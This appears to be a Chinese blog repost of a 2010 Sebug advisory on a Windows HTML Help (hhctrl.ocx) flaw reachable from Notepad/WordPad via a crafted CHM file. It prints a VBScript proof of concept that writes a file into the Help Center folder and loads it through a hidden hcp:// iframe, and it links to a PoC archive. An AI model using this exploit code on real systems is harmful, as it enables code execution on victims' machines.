Windows写字板HTML帮助文件处理远程代码执行漏洞

最新推荐文章于 2023-08-06 15:15:48 发布
原创 最新推荐文章于 2023-08-06 15:15:48 发布 · 786 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #microsoft #html #server #文本编辑 #javascript

SSV ID: 19278
SEBUG-Appdir: Microsoft Windows
发布时间:2010-03-15
信息提交: liscker (liscker_at_hotmail.com)
影响版本: 
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Server Pack 1
Microsoft Windows Server 2003 Server Pack 2
漏洞描述: 
写字板是Windows操作系统中附件所提供的简单文本编辑工具。

如果相对路径为参数的话hhctrl.ocx控件的HtmlHelpA()函数就会打开当前目录中的CHM文件。攻击者可以诱骗用户打开与特制notepad.chm文件处于同一目录中的.txt文件,notepad.exe打开该文件后用户在文档中按下F1键获得帮助时就会以本地安全环境执行任意JavaScript代码。

经现场测试,该漏洞不仅适用于 Microsoft Windows XP SP3、Microsoft Windows 2000SP4,同样适用于Microsoft Windows Server 2003 的所有版本,Microsoft Windows XP 及 Microsoft Windows 2003 的其他版本有可能也存在该漏洞。
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 
On Error Resume Next
Set a = CreateObject("ADODB.Connection")

 b  = ("Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=//127.0.0.1/C$/;Persist Security Info=False;") 

 a.Open  b
 set rs =CreateObject("ADODB.Recordset")
 rs.Open "SELECT * from liscker.txt", a
 rs.Save "C:/windows/pchealth/helpctr/vendors/CN=Microsoft Corporation,L=Redmond,S=Washington,C=US/bugrep.htm"
 rs.close
document.write "<iframe src=hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/bugrep.htm height=0 width=0></iframe>"
SEBUG安全建议: 
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/
// sebug.net [2010-03-17]

http://www.secumania.net/include/files/notepadpoc.zip
URnotFish
关注
windows|001】windows介绍及各种快捷键、文件扩展名、文件结构总结
小鹏linux的博客
03-15 1万+
微软于1985年11月20日推出了名为Windows的操作系统,作为MS-DOS的图形操作系统外壳,以响应对图形用户界面(GUI)的日益增长的兴趣。目录有类似于{7F40DE3E-8294-4E24- B2EA-80F6C6BB173C}名字的文件,看起来不太友好,这个目录并不是所谓的病毒目录,这个是软件的唯一标示GUID,有些软件为了区分,会生成一个唯一的名称以保证唯一 性,那么这个目录,就是软件为区分同名软件所创建的唯一配置文件保存目录,且这个软件的注册表,很有可能也是这个名称。
单招十类(计算机基础)知识点整理【备考版本】
最新发布
Lee's Blog
01-03 7708
计算机基础-知识点总结整理(一)基础理论考试内容1.信息、数据及通信的概念,计算机的发展历史与分类等。2.进制的概念及换算。3.信息安全基本知识、病毒及防治基本知识、社会信息道德及版权与知识产权的知识等。4.计算机硬件及相关设备的基础知识。5.数据存储及换算等。6.各种常用文件扩展名的意义等。(二)应用能力考试内容1.操作系统的使用2.网络基础知识及因特网的应用3.文字处理(Word)基本知识4.电子表格(Excel) 基本知识5.幻灯片(PowerPoint) 基本知识
写字板源代码
10-19
写字板大家都用过吧,想知道是怎么实现的吗 ?附件是写字板源代码
一个简单的写字板的源代码 v1.0 (完整源码)
10-21
一个简单的写字板的源代码 v1.0 (完整源码)C++ Builder写的。
写字板程序(具有完整源代码以及清晰界面)
04-17
写字板程序(具有完整源代码以及清晰界面),用于新手学习。
HTML代码大全
07-08
Html是英文 HyperText Markup Language 的缩写,中文意思是“超文本标志语言”,用它编写的文件(文档)的扩展名是.html或.htm,它们是可供浏览器解释浏览的文件格式。您可以使用记事本、写字板或 FrontPage Editor 等编辑工具来编写Html文件。Html语言使用标志对的方法编写文件,既简单又方便,它通常使用来表示标志的开始和结束(例如标志对),因此在Html文档中这样的标志对都必须是成对使用的。在此教程中,我先讲一下Html的基本标志:
Internet Explorer 无限循环拒绝服务漏洞
URnotFish的专栏
03-19 493
js挂马分析及处理方法
白强
09-23 729
js挂马分析及处理方法 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。   1:网页挂马的种类.   目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。   卢松松以前做...
2020最新PHP面试题(附带答案)
热门推荐
weixin_43814458的博客
03-02 2万+
1.什么事面向对象?主要特征是什么? 面向对象是程序的一种设计方式,它利于提高程序的重用性,使程序结构更加清晰。主要特征:封装、继承、多态。 我的官方群点击此处。 2.SESSION 与 COOKIE的区别是什么,请从协议,产生的原因与作用说明? 1、http无状态协议,不能区分用户是否是从同一个网站上来的,同一个用户请求不同的页面不能看做是同一个用户。 2、SESSION存储...
网管教程+从入门到精通软件篇
mvcgo的专栏
12-06 1万+
★一。★详细的xp修复控制台命令和用法!!!  放入xp(2000)的光盘,安装时候选R,修复!  Windows XP(包括 Windows 2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结,这次辛苦老范给我们整理了这份实用的秘笈。    Bootcfg    bootcfg 命令启动配置和故障恢复(
注册HHCTRL.ocx[解决XP系统不能打开CHM文件的问题]
02-20
注册HHCTRL.ocx[解决XP系统不能打开CHM文件的问题]
签名写字板.zip
08-03
canvas 和 jS 做的签名板demo,兼容移动端和pc端,有笔画颜色,撤回和反撤回功能。注意:在移动端使用的时候, 写竖的时候, 页面会被往下拉, 手写板动了, 写字不顺畅. 建议在移动端的touchmove事件里, 加一行防止页的滑动事件, 代码是: event.preventDefault();
关于xss攻击学习的总结
weixin_30532759的博客
06-01 485
关于xss攻击,网上相关的介绍很多,一搜索也是一大堆,这里我就对自己感兴趣的一些内容做个总结。 xss简单介绍 成因:xss是将恶意代码(多是JavaScript)插入html代码中。 分类: 1、 反射型 2、 存储型 3、 DOM型 1、 XSS的危害是这么? 攻击者构造可执行JavaScript的攻击链接,发送给受害者,多用于获取cookie,因为cooki...
联众世界某网站SQL注射漏洞
swordheart的博客
04-16 3263
漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-26: 细节向公众公开 简要描述: 联众世界某网站存在SQL注射漏洞,并支持UNION。 详细说明: http://mgame.ourgame.com/user_look.aspx?ID=axyy
百度某系统登陆页面跨站及CSRF漏洞
swordheart的博客
04-15 1765
漏洞详情 披露状态: 2010-07-25: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-25: 细节向公众公开 简要描述: 百度某系统登陆页面存在跨站及CSRF漏洞。 详细说明: http://data.baidu.com:80/report/accounts/checkLogin?
解决Windows系统缺少hhctrl.ocx文件无法运行程序问题
amio555的专栏
08-06 1398
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个hhctrl.ocx文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现hhctrl.ocx丢失要怎么解决?
microsoft html 帮助执行程序,HTML帮助中漏洞可能允许执行代码
weixin_36332394的博客
06-10 962
本文的目标读者:使用 Microsoft Windows 的客户漏洞的影响:远程执行代码最高严重等级:严重建议:用户应立即应用此更新。安全更新替代:无注意事项:Microsoft 支持库文章 890175 说明了当前客户安装此安全更新时可能遇到的已知问题。 此文章还介绍了有关这些问题的建议解决方法。Windows NT Server 4.0 和 Windows NT 4.0 Terminal Se...
实现简单的手写板(demo源码)
zhuweisky
12-24 1万+
在一些软件系统中,需要用到手写涂鸦的功能,然后可以将涂鸦的结果保存为图片,并可以将“真迹”通过网络发送给对方。这种手写涂鸦功能是如何实现的了?最直接的,我们可以使用Windows提供的GDI技术或GDI+技术来实现绘图功能。但是,要实现一个如此简单的涂鸦板,也不是那么容易的事情。幸运的是,我们可以直接使用OMCS提供的内置集成了这种功能的一个WinForm控件HandwritingPanel。
探索Windows2000写字板源代码:C语言学习资料
考虑到Windows写字板的应用名通常是WritePad或者Write,这里的“write”有可能是压缩文件包中包含了写字板的可执行文件、源代码文件或其他相关的开发资源。 结合以上信息,我们可以总结以下知识点: 1. Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值